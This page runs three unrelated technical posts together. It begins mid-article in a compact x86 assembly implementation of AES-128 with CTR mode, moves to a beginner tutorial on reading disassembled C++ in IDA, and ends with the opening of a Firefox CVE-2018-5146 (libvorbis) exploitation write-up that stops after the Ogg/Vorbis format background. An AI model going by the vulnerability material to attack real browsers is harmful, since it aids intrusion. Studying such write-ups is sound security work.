  /* 0002 */ "\x87\xd3"             /* xchg ebx, edx        */

Setting EAX to 1, our loop counter ECX to 4, and EDX to 0 can be accomplished in a variety of ways requiring only 7 bytes. The alternative for setting EAX here would be: XOR EAX, EAX; INC EAX.

// 7 bytes
  /* 0001 */ "\x6a\x01"             /* push 0x1             */
  /* 0003 */ "\x58"                 /* pop eax              */
  /* 0004 */ "\x6a\x04"             /* push 0x4             */
  /* 0006 */ "\x59"                 /* pop ecx              */
  /* 0007 */ "\x99"                 /* cdq                  */

Another way …

// 7 bytes
  /* 0001 */ "\x31\xc9"             /* xor ecx, ecx         */
  /* 0003 */ "\xf7\xe1"             /* mul ecx              */
  /* 0005 */ "\x40"                 /* inc eax              */
  /* 0006 */ "\xb1\x04"             /* mov cl, 0x4          */

And another..

// 7 bytes
  /* 0000 */ "\x6a\x01"             /* push 0x1             */
  /* 0002 */ "\x58"                 /* pop eax              */
  /* 0003 */ "\x99"                 /* cdq                  */
  /* 0004 */ "\x6b\xc8\x04"         /* imul ecx, eax, 0x4   */

ESI will point to s which contains our plain text and master key. ESI is normally reserved for read operations. We can load a byte with LODS into AL/EAX, and move values from ESI to EDI using MOVS.

Typically we see stack allocation using ADD or SUB, and sometimes (very rarely) using ENTER. This implementation only requires 32 bytes of stack space, and PUSHAD, which saves 8 general purpose registers on the stack, allocates exactly 32 bytes of memory with a 1-byte opcode.

To illustrate why it makes more sense to use PUSHAD/POPAD instead of ADD/SUB or ENTER/LEAVE, the following are x86 opcodes generated by assembler.

// 5 bytes
  /* 0000 */ "\xc8\x20\x00\x00" /* enter 0x20, 0x0 */
  /* 0004 */ "\xc9"             /* leave           */
  
// 6 bytes
  /* 0000 */ "\x83\xec\x20"     /* sub esp, 0x20   */
  /* 0003 */ "\x83\xc4\x20"     /* add esp, 0x20   */
  
// 2 bytes
  /* 0000 */ "\x60"             /* pushad          */
  /* 0001 */ "\x61"             /* popad           */

Obviously the 2-byte example is better here, but once you require more than 96 bytes, ADD/SUB in combination with a register is usually the better option.

; *****************************
; void E(void *s);
; *****************************
_E:
    pushad
    xor    ecx, ecx           ; ecx = 0
    mul    ecx                ; eax = 0, edx = 0
    inc    eax                ; c = 1
    mov    cl, 4
    pushad                    ; alloca(32)
; F(8)x[i]=((W*)s)[i];
    mov    esi, [esp+64+4]    ; esi = s
    mov    edi, esp
    pushad
    add    ecx, ecx           ; copy state + master key to stack
    rep    movsd
    popad

Multiplication

A pointer to this function is stored in EBP, and there are three reasons to use EBP over other registers:

  1. EBP has no 8-bit subregister, so we can’t use it for any 8-bit operations.
  2. Indirect memory access through EBP requires 1 extra byte even for a zero displacement.
  3. The only instructions that implicitly use EBP are ENTER and LEAVE.

// 2 vs 3 bytes for indirect access
  /* 0001 */ "\x8b\x5d\x00"         /* mov ebx, [ebp]       */
  /* 0004 */ "\x8b\x1e"             /* mov ebx, [esi]       */

When writing compact code, EBP is useful only as a temporary register or pointer to some function.

; *****************************
; Multiplication over GF(2**8)
; *****************************
    call   $+21               ; save address      
    push   ecx                ; save ecx
    mov    cl, 4              ; 4 bytes
    add    al, al             ; al <<= 1
    jnc    $+4                ;
    xor    al, 27             ;
    ror    eax, 8             ; rotate for next byte
    loop   $-9                ; 
    pop    ecx                ; restore ecx
    ret
    pop    ebp

SubByte

In the SubBytes step, each byte a_{i,j} in the state matrix is replaced with S(a_{i,j}) using an 8-bit substitution box. The S-box is derived from the multiplicative inverse over GF(2^8), and we can implement SubByte purely using code.
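For readers who prefer a straightforward version over the compact S() above, the sketch below builds the full S-box the textbook way: find each byte's multiplicative inverse in GF(2^8) by brute force, then apply the affine transform (the same rotate-and-XOR pattern used in the compact code). This is for illustration only and is not part of the assembly implementation.

#include <stdint.h>

// GF(2^8) multiplication, reducing modulo the AES polynomial 0x11B
static uint8_t gmul(uint8_t a, uint8_t b) {
    uint8_t p = 0;
    while (b) {
        if (b & 1) p ^= a;
        a = (uint8_t)((a << 1) ^ ((a & 0x80) ? 0x1B : 0));
        b >>= 1;
    }
    return p;
}

// build all 256 S-box entries: multiplicative inverse followed by the affine transform
void build_sbox(uint8_t sbox[256]) {
    int x, y, i;
    for (x = 0; x < 256; x++) {
        uint8_t inv = 0, b, r;
        for (y = 1; y < 256 && x; y++)              // 0 maps to 0 by convention
            if (gmul((uint8_t)x, (uint8_t)y) == 1) { inv = (uint8_t)y; break; }
        b = inv; r = b;
        for (i = 0; i < 4; i++) {                   // r = b ^ rotl(b,1..4)
            b = (uint8_t)((b << 1) | (b >> 7));
            r ^= b;
        }
        sbox[x] = (uint8_t)(r ^ 0x63);              // final XOR with 0x63
    }
}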

; *****************************
; B SubByte(B x)
; *****************************
sub_byte:  
    pushad 
    test   al, al            ; if(x){
    jz     sb_l6
    xchg   eax, edx
    mov    cl, -1            ; i=255 
; for(c=i=0,y=1;--i;y=(!c&&y==x)?c=1:y,y^=M(y));
sb_l0:
    mov    al, 1             ; y=1
sb_l1:
    test   ah, ah            ; !c
    jnz    sb_l2    
    cmp    al, dl            ; y!=x
    setz   ah
    jz     sb_l0
sb_l2:
    mov    dh, al            ; y^=M(y)
    call   ebp               ;
    xor    al, dh
    loop   sb_l1             ; --i
; F(4)x^=y=(y<<1)|(y>>7);
    mov    dl, al            ; dl=y
    mov    cl, 4             ; i=4  
sb_l5:
    rol    dl, 1             ; y=R(y,1)
    xor    al, dl            ; x^=y
    loop   sb_l5             ; i--
sb_l6:
    xor    al, 99            ; return x^99
    mov    [esp+28], al
    popad
    ret

AddRoundKey

The state matrix is combined with a subkey using the bitwise XOR operation. This step, known as key whitening, was inspired by the mathematician Ron Rivest, who in 1984 applied a similar technique to the Data Encryption Standard (DES) and called it DESX.

; *****************************
; AddRoundKey
; *****************************
; F(4)s[i]=x[i]^k[i];
    pushad
    xchg   esi, edi           ; swap x and s
xor_key:
    lodsd                     ; eax = x[i]
    xor    eax, [edi+16]      ; eax ^= k[i]
    stosd                     ; s[i] = eax
    loop   xor_key
    popad

AddRoundConstant

There are various cryptographic attacks possible against AES without this small but important step. It protects against the slide attack, first described in 1999 by David Wagner and Alex Biryukov. Without different round constants used to generate the round keys, all the round keys would be the same.

; *****************************
; AddRoundConstant
; *****************************
; *k^=c; c=M(c);
    xor    [esi+16], al
    call   ebp

ExpandRoundKey

The operation to expand the master key into subkeys for each round of encryption isn’t normally in-lined. To boost performance, the round keys are precomputed before the encryption process, since repeating the same computation for every block would only waste CPU cycles.
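For comparison, this is roughly what the conventional, precomputed key schedule looks like. It is only a sketch: it borrows the B/W typedefs, the R() rotate macro and S() from the C source above and, like that code, assumes a little-endian target.

// expand the 16-byte master key into all 11 round keys (44 words) up front
void expand_key(B *key, W rk[44]) {
    W i, j, w;
    B c = 1;                                   // round constant

    for (i = 0; i < 4; i++) rk[i] = ((W*)key)[i];

    for (i = 4; i < 44; i++) {
        w = rk[i - 1];
        if (i % 4 == 0) {
            w = R(w, 8);                       // RotWord (rotate right on little-endian)
            for (j = 0; j < 4; j++)            // SubWord: S-box each byte
                ((B*)&w)[j] = S(((B*)&w)[j]);
            w ^= c;                            // Rcon lands in the first key byte
            c = (B)((c << 1) ^ ((c & 0x80) ? 27 : 0));  // next Rcon (xtime)
        }
        rk[i] = rk[i - 4] ^ w;
    }
}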

Compacting the AES code into a single call requires in-lining the key expansion operation. The C code here is not directly translated into x86 assembly, but the assembly does produce the same result.

; ***************************
; ExpandRoundKey
; ***************************
; F(4)w<<=8,w|=S(((B*)k)[15-i]);w=R(w,8);F(4)w=k[i]^=w;
    pushad
    add    esi,16
    mov    eax, [esi+3*4]    ; w=k[3]
    ror    eax, 8            ; w=R(w,8)
exp_l1:
    call   S                 ; w=S(w)
    ror    eax, 8            ; w=R(w,8);
    loop   exp_l1
    mov    cl, 4
exp_l2:
    xor    [esi], eax        ; k[i]^=w
    lodsd                    ; w=k[i]
    loop   exp_l2
    popad

Combining the steps

An earlier version of the code used separate AddRoundKey, AddRoundConstant, and ExpandRoundKey steps, but since these all relate to using and updating the round key, the three are combined in order to reduce the number of loops, thus shaving off a few bytes.

; *****************************
; AddRoundKey, AddRoundConstant, ExpandRoundKey
; *****************************
; w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];
; w=R(w,8)^c;F(4)w=k[i]^=w;
    pushad
    xchg   eax, edx
    xchg   esi, edi
    mov    eax, [esi+16+12]  ; w=R(k[3],8);
    ror    eax, 8
xor_key:
    mov    ebx, [esi+16]     ; t=k[i];
    xor    [esi], ebx        ; x[i]^=t;
    movsd                    ; s[i]=x[i];
; w=(w&-256)|S(w)
    call   sub_byte          ; al=S(al);
    ror    eax, 8            ; w=R(w,8);
    loop   xor_key
; w=R(w,8)^c;
    xor    eax, edx          ; w^=c;
; F(4)w=k[i]^=w;
    mov    cl, 4
exp_key:
    xor    [esi], eax        ; k[i]^=w;
    lodsd                    ; w=k[i];
    loop   exp_key
    popad

Shifting Rows

ShiftRows cyclically shifts the bytes in each row of the state matrix by a certain offset. The first row is left unchanged. Each byte of the second row is shifted one to the left, with the third and fourth rows shifted by two and three respectively.

Because the order in which SubBytes and ShiftRows are applied doesn't matter, they're combined into one loop.
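
The index arithmetic is the least obvious part, so here is a rough C equivalent of the combined loop; SubByte() is the routine sketched earlier, and x and s are the 16-byte destination and source states, as in the comment below.

#include <stdint.h>

typedef uint8_t B;

B SubByte(B x);   /* sketched earlier */

/* SubBytes + ShiftRows: byte i sits in row (i % 4), column (i / 4) of the
   column-major state and lands in column ((i/4) - (i%4)) mod 4 of the same row */
static void sub_shift_rows(B x[16], const B s[16]) {
    int i;
    for (i = 0; i < 16; i++) {
        int row = i & 3;
        int col = ((i >> 2) - row) & 3;    /* & 3 wraps negative values mod 4 */
        x[col * 4 + row] = SubByte(s[i]);
    }
}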

; ***************************
; ShiftRows and SubBytes
; ***************************
; F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(((B*)s)[i]);
    pushad
    mov    cl, 16
shift_rows:
    lodsb                    ; al = S(s[i])
    call   sub_byte
    push   edx
    mov    ebx, edx          ; ebx = i%4
    and    ebx, 3            ;
    shr    edx, 2            ; (i/4 - ebx) % 4
    sub    edx, ebx          ; 
    and    edx, 3            ; 
    lea    ebx, [ebx+edx*4]  ; ebx = (ebx+edx*4)
    mov    [edi+ebx], al     ; x[ebx] = al
    pop    edx
    inc    edx
    loop   shift_rows
    popad

Mixing Columns

The MixColumns transformation, along with ShiftRows, is the main source of diffusion. Each column is treated as a four-term polynomial b(x) = b_{3}x^{3} + b_{2}x^{2} + b_{1}x + b_{0}, where the coefficients are elements of GF(2^{8}), and is multiplied modulo x^{4} + 1 by the fixed polynomial a(x) = 3x^{3} + x^{2} + x + 2.
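
In C this works out to the following sketch, assuming the M() helper behind EBP doubles all four bytes of a word in GF(2^8) at once (which is what the dword-wide call in the assembly below relies on):

#include <stdint.h>

typedef uint32_t W;

#define R(w, n) (((w) >> (n)) | ((w) << (32 - (n))))

/* doubles each byte of the word in GF(2^8) in parallel (word-wide xtime) */
static W M4(W w) {
    return ((w << 1) & 0xFEFEFEFEu) ^ (((w >> 7) & 0x01010101u) * 0x1B);
}

/* MixColumns over the four little-endian column words of the state */
static void mix_columns(W x[4]) {
    int i;
    for (i = 0; i < 4; i++) {
        W w = x[i];
        x[i] = R(w, 8) ^ R(w, 16) ^ R(w, 24) ^ M4(R(w, 8) ^ w);
    }
}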

; *****************************
; MixColumns
; *****************************
; F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
    pushad
mix_cols:
    mov    eax, [edi]        ; w0 = x[i];
    mov    ebx, eax          ; w1 = w0;
    ror    eax, 8            ; w0 = R(w0,8);
    mov    edx, eax          ; w2 = w0;
    xor    eax, ebx          ; w0^= w1;
    call   ebp               ; w0 = M(w0);
    xor    eax, edx          ; w0^= w2;
    ror    ebx, 16           ; w1 = R(w1,16);
    xor    eax, ebx          ; w0^= w1;
    ror    ebx, 8            ; w1 = R(w1,8);
    xor    eax, ebx          ; w0^= w1;
    stosd                    ; x[i] = w0;
    loop   mix_cols
    popad
    jmp    enc_main

Counter Mode (CTR)

Block ciphers should never be used in Electronic Code Book (ECB) mode, and the ECB Penguin illustrates why.

As you can see, blocks of the same data using the same key result in the exact same ciphertexts, which is why modes of encryption were invented. Galois/Counter Mode (GCM) is authenticated encryption which uses Counter (CTR) mode to provide confidentiality.

The concept of CTR mode which turns a block cipher into a stream cipher was first proposed by Whitfield Diffie and Martin Hellman in their 1979 publication, Privacy and Authentication: An Introduction to Cryptography.

CTR mode works by encrypting a nonce and counter, then XORing the resulting ciphertext with the plaintext. Since AES encrypts 16-byte blocks, the counter can be 8 bytes and the nonce 8 bytes.

The following is a very simple implementation of this mode using the AES-128 implementation.

// encrypt using Counter (CTR) mode
void encrypt(W len, B *ctr, B *in, B *key){
    W i,r;
    B t[32];

    // copy master key to local buffer
    F(16)t[i+16]=key[i];

    while(len){
      // copy counter+nonce to local buffer
      F(16)t[i]=ctr[i];
      
      // encrypt t
      E(t);
      
      // XOR plaintext with ciphertext
      r=len>16?16:len;
      F(r)in[i]^=t[i];
      
      // update length + position
      len-=r;in+=r;
      
      // update counter
      for(i=15;i>=0;i--)
        if(++ctr[i])break;
    }
}

In assembly

; void encrypt(W len, B *ctr, B *in, B *key)
_encrypt:
    pushad
    lea    esi,[esp+32+4]
    lodsd
    xchg   eax, ecx          ; ecx = len
    lodsd
    xchg   eax, ebp          ; ebp = ctr
    lodsd
    xchg   eax, edx          ; edx = in
    lodsd
    xchg   esi, eax          ; esi = key
    pushad                   ; alloca(32)
; copy master key to local buffer
; F(16)t[i+16]=key[i];
    lea    edi, [esp+16]     ; edi = &t[16]
    movsd
    movsd
    movsd
    movsd
aes_l0:
    xor    eax, eax
    jecxz  aes_l3            ; while(len){
; copy counter+nonce to local buffer
; F(16)t[i]=ctr[i];
    mov    edi, esp          ; edi = t
    mov    esi, ebp          ; esi = ctr
    push   edi
    movsd
    movsd
    movsd
    movsd
; encrypt t    
    call   _E                ; E(t)
    pop    edi
aes_l1:
; xor plaintext with ciphertext
; r=len>16?16:len;
; F(r)in[i]^=t[i];
    mov    bl, [edi+eax]     ; 
    xor    [edx], bl         ; *in++^=t[i];
    inc    edx               ; 
    inc    eax               ; i++
    cmp    al, 16            ;
    loopne aes_l1            ; while(i!=16 && --ecx!=0)
; update counter
    xchg   eax, ecx          ; 
    mov    cl, 16
aes_l2:
    inc    byte[ebp+ecx-1]   ;
    loopz  aes_l2            ; while(++c[i]==0 && --ecx!=0)
    xchg   eax, ecx
    jmp    aes_l0
aes_l3:
    popad
    popad
    ret

Summary

The final assembly code for ECB mode is 205 bytes, and 272 for CTR mode.

Check sources here.

Reverse Engineering Basic Programming Concepts

Reverse Engineering

Throughout the reverse engineering learning process I have found myself wanting a straightforward guide for what to look for when browsing through assembly code. While I’m a big believer in reading source code and manuals for information, I fully understand the desire to have concise, easy to comprehend, information all in one place. This “BOLO: Reverse Engineering” series is exactly that! Throughout this article series I will be showing you things to Be On the Look Out for when reverse engineering code. Ideally, this article series will make it easier for beginner reverse engineers to get a grasp on many different concepts!

Preface

Throughout this article you will see screenshots of C++ code and assembly code along with some explanation as to what you’re seeing and why things look the way they look. Furthermore, this article series will not cover the basics of assembly; it will only present patterns and decompiled code so that you can get a general understanding of what to look for and how to interpret assembly code.

Throughout this article we will cover:

  1. Variable Initiation
  2. Basic Output
  3. Mathematical Operations
  4. Functions
  5. Loops (For loop / While loop)
  6. Conditional Statements (IF Statement / Switch Statement)
  7. User Input

Please note: this tutorial was made with Visual C++ in Microsoft Visual Studio 2015 (I know, an outdated version). Some of the assembly code (i.e. user input with cin) will reflect that. Furthermore, I am using IDA Pro as my disassembler.


Variable Initiation

Variables are extremely important when programming, here we can see a few important variables:

  1. a string
  2. an int
  3. a boolean
  4. a char
  5. a double
  6. a float
  7. a char array
Basic Variables

Please note: in C++, ‘string’ is not a primitive type, but I thought it important to show you anyway.

Now, let’s take a look at the assembly:

Initiating Variables

Here we can see how IDA represents space allocation for variables. As you can see, we’re allocating space for each variable before we actually initialize it.

Initializing Variables

Once space is allocated, we move the values that we want to set each variable to into the space we allocated for said variable. Although the majority of the variables are initialized here, below you will see the C++ string initiation.

C++ String Initiation

As you can see, initializing a string requires a call to a built-in initialization function.

Basic Output

preface info: Throughout this section I will be talking about items pushed onto the stack and used as parameters for the printf function. The concept of function parameters will be explained in better detail later in this article.

Although this tutorial was built in visual C++, I opted to use printf rather than cout for output.

Basic Output

Now, let’s take a look at the assembly:

First, the string literal:

String Literal Output

As you can see, the string literal is pushed onto the stack to be called as a parameter for the printf function.

Now, let’s take a look at one of the variable outputs:

Variable Output

As you can see, first the intvar variable is moved into the EAX register, which is then pushed onto the stack along with the “%i” string literal used to indicate integer output. These variables are then taken from the stack and used as parameters when calling the printf function.

Mathematical Functions

In this section, we’ll be going over the following mathematical functions:

  1. Addition
  2. Subtraction
  3. Multiplication
  4. Division
  5. Bitwise AND
  6. Bitwise OR
  7. Bitwise XOR
  8. Bitwise NOT
  9. Bitwise Right-Shift
  10. Bitwise Left-Shift
Mathematical Functions Code
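
The “Mathematical Functions Code” screenshot isn’t reproduced here, but the source being disassembled is roughly the following (variable names are illustrative):

#include <stdio.h>

int main(void) {
    int A = 10;                 /* 0x0A in the disassembly */
    int B = 15;                 /* 0x0F in the disassembly */

    int sum        = A + B;     /* add  */
    int difference = A - B;     /* sub  */
    int product    = A * B;     /* imul */
    int quotient   = A / B;     /* cdq + idiv */
    int bit_and    = A & B;     /* and  */
    int bit_or     = A | B;     /* or   */
    int bit_xor    = A ^ B;     /* xor  */
    int bit_not    = ~A;        /* not  */
    int rshift     = A >> 1;    /* sar  */
    int lshift     = A << 1;    /* shl  */

    printf("%i %i %i %i %i %i %i %i %i %i\n", sum, difference, product,
           quotient, bit_and, bit_or, bit_xor, bit_not, rshift, lshift);
    return 0;
}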

Let’s break each function down into assembly:

First, we set A to hex 0A, which represents decimal 10, and B to hex 0F, which represents decimal 15.

Variable Setting

We add by using the ‘add’ opcode:

Addition

We subtract using the ‘sub’ opcode:

Subtraction

We multiply using the ‘imul’ opcode:

Multiplication

We divide using the ‘idiv’ opcode. In this case, we also use ‘cdq’ to sign-extend EAX into EDX:EAX, since idiv divides the 64-bit value held in EDX:EAX.

Division

We perform the Bitwise AND using the ‘and’ opcode:

Bitwise AND

We perform the Bitwise OR using the ‘or’ opcode:

Bitwise OR

We perform the Bitwise XOR using the ‘xor’ opcode:

Bitwise XOR

We perform the Bitwise NOT using the ‘not’ opcode:

Bitwise NOT

We perform the Bitwise Right-Shift using the ‘sar’ opcode:

Bitwise Right-Shift

We perform the Bitwise Left-Shift using the ‘shl’ opcode:

Bitwise Left-Shift

Function Calls

In this section, we’ll be looking at 3 different types of functions:

  1. a basic void function
  2. a function that returns an integer
  3. a function that takes in parameters

Calling Functions

First, let’s take a look at calling newfunc() and newfuncret() because neither of those actually take in any parameters.

Calling Functions Without Parameters

If we follow the call to the newfunc() function, we can see that all it really does is print out “Hello! I’m a new function!”:

The newfunc() Function Code
The newfunc() Function

As you can see, this function does use the retn opcode, but only to return to the previous location (so that the program can continue after the function completes). Now, let’s take a look at the newfuncret() function, which generates a random integer using the C++ rand() function and then returns said integer.

The newfuncret() Function Code
The newfuncret() function

First, space is allocated for the A variable. Then, the rand() function is called, which returns a value in the EAX register. Next, EAX is moved into the A variable’s space, effectively setting A to the result of rand(). Finally, the A variable is moved into EAX so that the function can use it as a return value.

Now that we have an understanding of how to call a function and what it looks like when a function returns something, let’s talk about calling functions with parameters:

First, let’s take another look at the call statement:

Calling a Function with Parameters in C++
Calling a Function with Parameters

Although strings in C++ require a call to a basic_string function, the concept of calling a function with parameters is the same regardless of data type. First, you move the variable into a register, then you push the registers onto the stack, then you call the function.

Let’s take a look at the function’s code:

The funcparams() Function Code
The funcparams() Function

All this function does is take in a string, an integer, and a character and print them out using printf. As you can see, first the three variables are allocated at the top of the function, then these variables are pushed onto the stack as parameters for the printf function. Easy peasy.
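
Putting the three together, a plausible reconstruction of the functions discussed in this section looks like this (the article passes a C++ std::string; a plain C string is used here for brevity):

#include <stdio.h>
#include <stdlib.h>

void newfunc(void) {                          /* basic void function */
    printf("Hello! I'm a new function!\n");
}

int newfuncret(void) {                        /* returns an integer */
    int a = rand();                           /* result comes back in EAX */
    return a;
}

void funcparams(const char *str, int i, char c) {   /* takes parameters */
    printf("%s %i %c\n", str, i, c);
}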

Loops

Now that we have function calling, output, variables, and math down, let’s move on to flow control. First, we’ll start with a for loop:

For Loop Code
A graphical Overview of the For Loop

Before we break down the assembly code into smaller sections, let’s take a look at the general layout. As you can see, when the for loop starts, it has two options: it can either go to the box on the right (green arrow) and return, or it can go to the box on the left (red arrow) and loop back to the start of the for loop.

Detailed For Loop

First, we check if we’ve hit the maximum value by comparing the i variable to the max variable. If the i variable is not greater than or equal to the max variable, we continue down to the left, print out the i variable, then add 1 to i and continue back to the start of the loop. If the i variable is, in fact, greater than or equal to max, we simply exit the for loop and return.
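
In source form, the loop being described is roughly the following (the bound and the output format come from the screenshots, so treat the exact values as illustrative):

#include <stdio.h>

void count_to(int max) {
    for (int i = 0; i < max; i++) {   /* the jge in the assembly exits once i >= max */
        printf("%i\n", i);
    }
}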

Now, let’s take a look at a while loop:

While Loop Code
While Loop

In this loop, all we’re doing is generating a random number between 0 and 20. If the number is greater than 10, we exit the loop and print “I’m out!”; otherwise, we continue to loop.

In the assembly, the A variable is generated and set to 0 originally, then we initialize the loop by comparing A to the hex number 0A which represents decimal 10. If A is not greater than or equal to 10, we generate a new random number which is then set to A and we continue back to the comparison. If A is greater than or equal to 10, we break out of the loop, print out “I’m out” and then return.
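
A plausible reconstruction of that while loop in source form (the modulus is illustrative; the comparison against 10 is the one visible in the assembly):

#include <stdio.h>
#include <stdlib.h>

void spin(void) {
    int A = 0;
    while (A < 10) {          /* the assembly compares A against 0x0A (10) */
        A = rand() % 21;      /* random number between 0 and 20 */
    }
    printf("I'm out!\n");
}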

If Statements

Next, we’ll be talking about if statements. First, let’s take a look at the code:

IF Statement Code

This function generates a random number between 0 and 20 and stores said number in the variable A. If A is greater than 15, the program will print out “greater than 15”. If A is less than 15 but greater than 10, the program will print out “less than 15, greater than 10”. This pattern will continue until A is less than 5, in which case the program will print out “less than 5”.
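
Reconstructed in source form, the cascade looks roughly like this (the middle messages are paraphrased from the description above):

#include <stdio.h>
#include <stdlib.h>

void check(void) {
    int A = rand() % 21;                          /* random number between 0 and 20 */
    if (A > 15)
        printf("greater than 15\n");
    else if (A > 10)
        printf("less than 15, greater than 10\n");
    else if (A > 5)
        printf("less than 10, greater than 5\n");
    else
        printf("less than 5\n");
}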

Now, let’s take a look at the assembly graph:

IF Statement Assembly Graph

As you can see, the assembly is structured similarly to the actual code. This is because IF statements are simply “If X Then Y Else Z”. If we look at the first set of arrows coming out of the top section, we can see a comparison between the A variable and hex 0F, which represents decimal 15. If A is greater than or equal to 15, the program will print out “greater than 15” and then return. Otherwise, the program will compare A to hex 0A, which represents decimal 10. This pattern will continue until the program prints and returns.

Switch Statements

Switch statements are a lot like IF statements except in a Switch statement one variable or statement is compared to a number of ‘cases’ (or possible equivalences). Let’s take a look at our code:

Switch Statement Code

In this function, we set the variable A to equal a random number between 0 and 10. Then, we compare A to a number of cases using a Switch statement. If A is equal to any of the possible cases, the case number will be printed, and then the program will break out of the Switch statement and the function will return.
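
In source form the switch looks roughly like this (only a few of the possible cases are shown; case 5 is the one walked through in the graph below):

#include <stdio.h>
#include <stdlib.h>

void pick(void) {
    int A = rand() % 11;      /* random number between 0 and 10 */
    switch (A) {
        case 0:  printf("0\n"); break;
        case 1:  printf("1\n"); break;
        case 5:  printf("5\n"); break;
        /* ... one case per possible value ... */
        default: break;       /* falls through to the return section */
    }
}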

Now, let’s take a look at the assembly graph:

Switch Case Assembly Graph

Unlike IF statements, switch statements do not follow the “If X Then Y Else Z” rule; instead, the program simply compares the conditional statement to the cases and only executes a case if said case is the conditional statement’s equivalent. Let’s first take a look at the initial 2 boxes:

The First 2 Graph Sections

First, the program generates a random number and sets it to A. Then, the program initializes the switch statement by first setting a temporary variable (var_D0) to equal A, then ensuring that var_D0 meets at least one of the possible cases. If var_D0 needs to default, the program follows the green arrow down to the final return section (see below). Otherwise, the program initiates a switch jump to the equivalent case’s section:

In the case that var_D0 (A) is equal to 5, the code will jump to the above case section, print out “5” and then jump to the return section.

User Input

In this section, we’ll cover user input using the C++ cin function. First, let’s look at the code:

User Input Code

In this function, we simply take in a string to the variable sentence using the C++ cin function and then we print out sentence through a printf statement.

Let’s break this down into assembly. First, the C++ cin part:

C++ cin

This code simply initializes the string sentence then calls the cin function and sets the input to the sentence variable. Let’s take a look at the cin call a bit closer:

The C++ cin Function Upclose

First, the program sets the contents of the sentence variable to EAX, then pushes EAX onto the stack to be used as a parameter for the cin function, which is then called and has its output moved into ECX, which is then put on the stack for the printf statement:

User Input printf Statement

Thanks!

Writeup for CVE-2018-5146 or How to kill a (Fire)fox – en

1. Debug Environment

  • OS
    • Windows 10
  • Firefox_Setup_59.0.exe
    • SHA1: 294460F0287BCF5601193DCA0A90DB8FE740487C
  • Xul.dll
    • SHA1: E93D1E5AF21EB90DC8804F0503483F39D5B184A9

2. Patch Information

The issue in Mozilla’s Bugzilla is Bug 1446062.
The vulnerability used at Pwn2Own 2018 was assigned CVE-2018-5146.
From the Mozilla security advisory, we can see that this vulnerability comes from libvorbis, a third-party media library. In the next section, I will introduce some background information about this library.

3. Ogg and Vorbis

3.1. Ogg

Ogg is a free, open container format maintained by the Xiph.Org Foundation.
An “Ogg file” consists of one or more “Ogg Pages”, and each “Ogg Page” contains one Ogg header and one segment table.
The structure of an Ogg Page can be illustrated with the following picture.

Pic.1 Ogg Page Structure
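
Since the picture isn’t reproduced here, the page header layout (per the Ogg spec, RFC 3533) is roughly the following; the struct is only illustrative, because the real header is a packed little-endian byte stream:

#include <stdint.h>

struct ogg_page_header {
    char     capture_pattern[4];   /* "OggS" */
    uint8_t  version;              /* 0 */
    uint8_t  header_type;          /* continuation / BOS / EOS flags */
    uint64_t granule_position;
    uint32_t bitstream_serial;
    uint32_t page_sequence;
    uint32_t crc_checksum;
    uint8_t  page_segments;        /* number of entries in the segment table */
    /* followed by page_segments lacing values and then the segment data */
};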

3.2. Vorbis

Vorbis is a free and open-source software project headed by the Xiph.Org Foundation.
In an Ogg file, the Vorbis-related data is encapsulated in the segment table inside each Ogg Page.
One MIT document shows the encapsulation process.

3.2.1. Vorbis Header

In Vorbis there are three kinds of Vorbis headers, and every Vorbis bitstream must carry all three. They are:

  • Vorbis Identification Header
    Declares that the Ogg bitstream is in Vorbis format and contains information such as the Vorbis version and the basic audio parameters of the bitstream, including the number of channels and the bitrate.
  • Vorbis Comment Header
    Contains user-defined comments, such as vendor information.
  • Vorbis Setup Header
    Contains the information needed to set up the codec, such as the complete VQ and Huffman codebooks used in decoding.
3.2.2. Vorbis Identification Header

The Vorbis Identification Header structure can be illustrated as follows:

Pic.2 Vorbis Identification Header Structure
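
Again in lieu of the picture, the identification header carries roughly these fields (per the Vorbis I spec; the header is bit-packed, so the struct only illustrates field order and widths). The two blocksize fields are the ones that later feed ci->blocksizes[], as discussed in section 4.2.

#include <stdint.h>

struct vorbis_id_header {
    uint8_t  packet_type;        /* 0x01 for the identification header */
    char     magic[6];           /* "vorbis" */
    uint32_t vorbis_version;
    uint8_t  audio_channels;
    uint32_t audio_sample_rate;
    int32_t  bitrate_maximum;
    int32_t  bitrate_nominal;
    int32_t  bitrate_minimum;
    unsigned blocksize_0 : 4;    /* log2 of the two legal block sizes */
    unsigned blocksize_1 : 4;
    unsigned framing_flag : 1;
};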

3.2.3. Vorbis Setup Header

The Vorbis Setup Header structure is more complicated than the other headers; it contains several substructures, such as codebooks.
After “vorbis” comes the number of codebooks, followed by that many CodeBook objects, and then the TimeBackends, FloorBackends, ResidueBackends, MapBackends, and Modes.
The Vorbis Setup Header structure can be roughly illustrated as follows:

Pic.3 Vorbis Setup Header Structure

3.2.3.1. Vorbis CodeBook

As in the Vorbis spec, a CodeBook structure can be represented as follows:

byte 0: [ 0 1 0 0 0 0 1 0 ] (0x42)
byte 1: [ 0 1 0 0 0 0 1 1 ] (0x43)
byte 2: [ 0 1 0 1 0 1 1 0 ] (0x56)
byte 3: [ X X X X X X X X ]
byte 4: [ X X X X X X X X ] [codebook_dimensions] (16 bit unsigned)
byte 5: [ X X X X X X X X ]
byte 6: [ X X X X X X X X ]
byte 7: [ X X X X X X X X ] [codebook_entries] (24 bit unsigned)
byte 8: [ X ] [ordered] (1 bit)
byte 8: [ X 1 ] [sparse] flag (1 bit)

After the header there is a length_table array whose length equals codebook_entries. Each element of this array is 5 or 6 bits long, depending on the flags.
It is followed by the VQ-related structure:

[codebook_lookup_type] 4 bits
[codebook_minimum_value] 32 bits
[codebook_delta_value] 32 bits
[codebook_value_bits] 4 bits and plus one
[codebook_sequence_p] 1 bits

Finally there is a VQ-table array of length codebook_dimensions * codebook_entries, with each element codebook_value_bits long.
codebook_minimum_value and codebook_delta_value are represented as floats, but to support different platforms the Vorbis spec defines its own internal representation of “float”, which is then converted into the system float type using the system math functions. On Windows it is converted to double first and then to float.
All of the above makes up a CodeBook structure.

3.2.3.2. Vorbis Time

In the current Vorbis spec, this data structure is nothing but a placeholder; all of its data should be zero.

3.2.3.3. Vorbis Floor

In the current Vorbis spec there are two different FloorBackend structures, but they are not relevant to the vulnerability, so we can skip this data structure.

3.2.3.4. Vorbis Residue

In the current Vorbis spec there are three kinds of ResidueBackend, and each one calls a different decode function during the decode process. The structure can be presented as follows:

[residue_begin] 24 bits
[residue_end] 24 bits
[residue_partition_size] 24 bits and plus one
